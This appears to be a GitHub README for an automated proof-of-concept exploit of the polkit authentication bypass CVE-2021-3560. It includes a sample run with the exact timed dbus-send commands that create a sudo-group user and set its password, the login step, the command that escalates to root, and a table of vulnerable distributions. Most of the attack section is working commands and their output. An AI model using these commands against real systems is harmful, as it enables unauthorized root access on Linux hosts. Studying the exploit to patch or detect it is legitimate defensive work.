Skip to content

Latest commit

 

History

History
118 lines (105 loc) · 3.63 KB

README.md

File metadata and controls

118 lines (105 loc) · 3.63 KB

polkit-auto-exploit

Automatic Explotation PoC for Polkit CVE-2021-3560

Summary

CVE-2021-3560 is an authentication bypass on polkit, which allows unprivileged user to call privileged methods using DBus, in this exploit we will call 2 privileged methods provided by accountsservice (CreateUser and SetPassword), which allows us to create a priviliged user then setting a password to it and at the end logging as the created user and then elevate to root. https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

Usage

ubuntu@ubuntu2004:~/polkit-auto-exploit$ ./polkit-auto-exploit -u adminhs -p admin1 -f admin
[===] Auto Exploitation PoC for Polkit CVE-2021-3560 by Petruknisme [===]
[+] Current User: ubuntu
[+] Variable for Polkit Configuration
[*] Username : adminhs
[*] Password : admin1
[*] Fullname : admin
[+] Sending create user command to determine time execution
[*] Execution time: 0.018076ms
[+] Time to killing dbus-send setting to 0.009038ms
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:adminhs string:'admin' int32:1 & sleep 0.009038s ; kill $!
..................
[+] GOTCHAAA! User adminhs is created with sudo member group
[+] Getting UID from user: 1015
[+] Creating password with OpenSSL
$5$wwCpZi2.onsiKa6b$B/OovlhfvFWs65EdYnk/1sL.sYSzfPXd1s6ZpurHNr0
[+] Triggering polkit to create password for adminhs
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1015 org.freedesktop.Accounts.User.SetPassword string:'$5$wwCpZi2.onsiKa6b$B/OovlhfvFWs65EdYnk/1sL.sYSzfPXd1s6ZpurHNr0' string:admin & sleep 0.009038s ; kill $!
Failed to execute command: echo admin1 | su -c id adminhs
uid=1015(adminhs) gid=1015(adminhs) groups=1015(adminhs),27(sudo)

[+] GOTCHAAA! Success login with User adminhs & password: admin1
[+] You can login to root using su with user and password created before: su -c 'sudo su' adminhs

Tested

  • Ubuntu 20.04(policykit-1/focal,now 0.105-26ubuntu1)

Information

Any system that has polkit version 0.113 (or later) installed is vulnerable. That includes popular distributions such as RHEL 8 with polkit version 0.115 and Ubuntu 20.04 with polkit version 0-105-26 (Debian fork of polkit)

Vulnerable Distro

Distribution Vulnerable?
RHEL 7 No
RHEL 8 Yes
Fedora 20 (or earlier) No
Fedora 21 (or later) Yes
Debian 10 (“buster”) No
Debian testing (“bullseye”) Yes
Ubuntu 18.04 No
Ubuntu 20.04 Yes

License

MIT License